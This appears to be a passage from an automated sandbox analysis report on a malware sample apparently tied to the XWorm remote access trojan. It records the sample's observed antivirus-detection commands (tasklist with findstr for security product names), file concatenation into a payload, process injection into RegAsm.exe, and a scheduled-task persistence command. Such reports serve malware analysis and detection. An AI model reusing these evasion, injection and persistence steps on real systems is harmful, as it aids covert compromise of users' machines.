Source: RegAsm.exe, 00000017.00000002.2975642601.0000000006780000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll["
Source: RegAsm.exe, 00000017.00000002.2972830964.00000000012E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VmCi-
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EB45D5 BlockInput, 10_2_00EB45D5
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E55240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 10_2_00E55240
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E75CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 10_2_00E75CAC
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E988CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 10_2_00E988CD
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00E6A385
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6A354 SetUnhandledExceptionFilter, 10_2_00E6A354
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031A354 SetUnhandledExceptionFilter, 18_2_0031A354
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_0031A385
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Memory written: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe base: 1030000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Memory written: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe base: 1030000
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Memory written: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe base: F7D000
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E99369 LogonUserW, 10_2_00E99369
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E55240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 10_2_00E55240
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA1AC6 SendInput,keybd_event, 10_2_00EA1AC6
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA51E2 mouse_event, 10_2_00EA51E2
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 438799
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "pantyhoseyourslandscapesdisposition" Flyer
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Dump.pif L
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m"
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E988CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 10_2_00E988CD
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 10_2_00EA4F1C
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028DD000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1753045770.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000000.1744374381.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q(
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managert-^q
Source: Dump.pif, ImageSyncProX.scr Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6885B cpuid 10_2_00E6885B
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E80030 GetLocalTime,__swprintf, 10_2_00E80030
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E80722 GetUserNameW, 10_2_00E80722
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E7416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 10_2_00E7416A
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406805
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: RegAsm.exe, 00000017.00000002.2972830964.0000000001321000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
Source: Yara match File source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2973858744.000000000303A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Dump.pif PID: 5432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: ImageSyncProX.scr Binary or memory string: WIN_81
Source: ImageSyncProX.scr Binary or memory string: WIN_XP
Source: ImageSyncProX.scr Binary or memory string: WIN_XPe
Source: ImageSyncProX.scr Binary or memory string: WIN_VISTA
Source: ImageSyncProX.scr Binary or memory string: WIN_7
Source: ImageSyncProX.scr Binary or memory string: WIN_8
Source: Dump.pif.1.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
Source: Yara match File source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2973858744.000000000303A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Dump.pif PID: 5432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EB696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 10_2_00EB696E
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EB6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 10_2_00EB6E32
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0036696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 18_2_0036696E
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00366E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 18_2_00366E32